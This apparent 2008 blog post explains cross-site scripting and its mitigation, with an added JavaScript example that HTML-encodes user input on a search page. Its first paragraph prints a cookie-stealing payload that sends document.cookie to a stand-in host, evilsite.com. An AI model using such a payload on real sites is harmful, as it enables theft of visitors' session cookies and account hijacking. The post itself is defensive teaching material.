Cross Site Scripting (XSS) is a vulnerability that is caused when web programmers fail to validate user input that is later published on the page. If an attacker were to input a script like <script>alert("hello world!")</script> into a form, then the JavaScript would be published on the page and executed in the browser as if it came from the site itself. The previous script is harmless, but if an attacker were to input a script like <script>window.open("http://evilsite.com/cookiegrabber.php?cookies="+document.cookie);</script> the attacker could steal the session cookies from every user who visits the XSS-vulnerable site. This vulnerability is common on search pages written in PHP, but it can be found in any page that accepts user input. There are many variations on this attack and it seems to be very popular.
Attack mitigation: Check all user input and convert the (, <, >, /, %, ", ', +, &, ) characters to literal values like &lt; and &gt; before storing them or displaying them on a page.
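The mitigation above as an added example, not code from the original post: a search page that echoes its query, first unencoded and then with the listed characters converted to HTML entities. The function names and the page template are assumptions, and the sample input is the harmless test script quoted earlier.

```javascript
// Added example (not from the original post): encode the characters the
// post lists before they are written into an HTML page.
// Function names and the search-page template are assumptions.

// Each listed character mapped to its HTML entity.
const ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
  "/": "&#47;",
  "%": "&#37;",
  "+": "&#43;",
  "(": "&#40;",
  ")": "&#41;",
};

// Single pass over the input, so the "&" produced by one replacement is
// never encoded a second time.
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'\/%+()]/g, (ch) => ENTITIES[ch]);
}

// "Before": user input concatenated straight into the page.
function renderSearchUnsafe(query) {
  return "<p>Results for: " + query + "</p>";
}

// "After": same page, input encoded at output time.
function renderSearchEncoded(query) {
  return "<p>Results for: " + encodeForHtml(query) + "</p>";
}

// Constructed sample input: the harmless test script from the post.
const sample = '<script>alert("hello world!")</script>';

console.log(renderSearchUnsafe(sample));   // markup reaches the page intact
console.log(renderSearchEncoded(sample));  // shown to the visitor as plain text
```

This encoding is sufficient for text placed between HTML tags. Input written into attribute values, script blocks or URLs needs encoding specific to that context.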
Thanks to Xylitol and CgiSecurity for their helpful guides.
Friday, March 28, 2008